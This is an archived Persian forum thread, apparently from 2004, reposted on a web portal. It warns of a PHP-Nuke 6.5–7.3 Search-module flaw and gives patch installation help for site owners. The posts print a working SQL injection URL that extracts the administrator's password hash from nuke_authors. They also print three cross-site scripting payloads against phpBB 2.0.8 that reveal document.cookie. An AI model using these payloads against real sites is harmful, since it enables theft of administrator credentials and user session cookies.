محبوبترینها
با چاپ روی وسایل یک کسب و کار پرسود بسازید
قیمت دیگ بخار و تولیدکننده اصلی دیگ بخار
معروفترین هدیه و سوغاتی یزد مشخص شد!
آشنایی با انواع دوربین مداربسته ضد آب
پرداخت اینترنتی قبوض ساختمان (پرداخت قبض گاز، برق و آب)
بهترین دوره آموزش سئو محتوا در سال 1403 با نام طوفان ۱۴۰۳ در فروردین ماه شروع می شود
یک صرافی ارز دیجیتال چه امکاناتی باید داشته باشد؟
تعمیرگاه مجاز تعمیر ماشین لباسشویی در شرق تهران
تعمیرگاه مجاز تعمیر ماشین لباسشویی در شرق تهران
جراحی و درمان ریشه دندان عفونی با خانم دکتر صفوراامامی
چه مواردی بر قیمت کابین دوش حمام تاثیر دارند؟
صفحه اول
آرشیو مطالب
ورود/عضویت
هواشناسی
قیمت طلا سکه و ارز
قیمت خودرو
مطالب در سایت شما
تبادل لینک
ارتباط با ما
مطالب سایت سرگرمی سبک زندگی سینما و تلویزیون فرهنگ و هنر پزشکی و سلامت اجتماع و خانواده تصویری دین و اندیشه ورزش اقتصادی سیاسی حوادث علم و فناوری سایتهای دانلود گوناگون
مطالب سایت سرگرمی سبک زندگی سینما و تلویزیون فرهنگ و هنر پزشکی و سلامت اجتماع و خانواده تصویری دین و اندیشه ورزش اقتصادی سیاسی حوادث علم و فناوری سایتهای دانلود گوناگون
آمار وبسایت
تعداد کل بازدیدها :
1798549850
جديدترين باگ در PHPNUKE - تاريخ : 27 فروردين -
واضح آرشیو وب فارسی:سایت ریسک: t=14428">جديدترين باگ در PHPNUKE - تاريخ : 27 فروردين amirfigo_62 27 تير 1383, 18:10جديترين باگ در PHPNUKE نسخه هاي اسيب پذير : PHP-NUKE 6.5 - 7.3 درجه : critical نويسنده : Janek Vind در تاريخ 27 فروردين و كمتر از 6 ساعت قبل باگ جديدي در ماژول Search پيدا شد كه امكان بدست اوردن MD 5 مدير سايت را به نفوذگر ميدهد كد اكسپلويت : modules.php?name=Search&type=comments& query=not123exists&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors مثال : exists&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors در صورتي كه سايت شما از سيستم امنيتي استفاده ميكند و كدهايي مثل * و UNION فيلتر شده هستند اين باگ خطري براي سايت شما ندارد در غير اين صورت تا ارائه patch ماژول Search را غير فعال كنيد دريافت سيستم امنيتي مشهدتيم : بزودي Patch اين باگ توسط گروه مشهدتيم ارائه خواهد شد همچنين چند اكسپلويت براي PHPBB 2.0.8 كشف شده كه عبارتند از: ;//localhost/phpbb 208/faq.php? faq[0][0]=f00<script>alert(document.cookie);</script>bar&faq[0][1]=amir و ;//localhost/phpbb 208/faq.php?mode=bbcode& faq[0][0]=f00<script>alert(document.cookie);</script>bar&faq[0][1]=amir و ;//localhost/phpbb 208/index.php?category_rows[0][cat_id]=1 &category_rows[0][cat_title]=amir<script>alert(document.cookie);</script> &category_rows[0][cat_order]=99 ------------------ عضويت در خبرنامه اختصاصي PHPNUKE : ايميل خود را به [email protected] ارسال كنيد Ashioone007 28 تير 1383, 13:37من patch مشهد تيم رو دريافت كردم ولي نمي تونم در كپوم قسمت بايد آپلود كنم ممنون مي شم منو راهنمايي كنيد amirfigo_62 28 تير 1383, 15:04سلام patch رو از ادرس : دريافت كنيد يك سري پوشه مثل modules - includes داره كه خوب بايد فايلاش جايگزين قبليا بشه فايل هايي هم كه در شاخه اصلي بايد باشه مثل mainfile.php - index.php هم به همين صورت وقتي دارين فايلا رو اپلود ميكنيد كافيه موقعي كه از شما سوال ميشه ميخواين فايل ها over right بشه شما yes to all رو بزنيد تا بصورت كامل patch نصب بشه مثلا اگه فايل class_sql_inject.php رو از پوشه includes اپلود نكنيد سايت شما پيغام خطا ميده چون در mainfile.php تعريف شده كه اول اين فايل فراخواني بشه تا تست كنه ادرسي كه درخواست شده معتبر هست و از كدهاي غير مجاز توش استفاده ميشه يا نه موفق باشيد امير
این صفحه را در گوگل محبوب کنید
[ارسال شده از: سایت ریسک]
[مشاهده در: www.ri3k.eu]
[تعداد بازديد از اين مطلب: 854]
-
گوناگون
پربازدیدترینها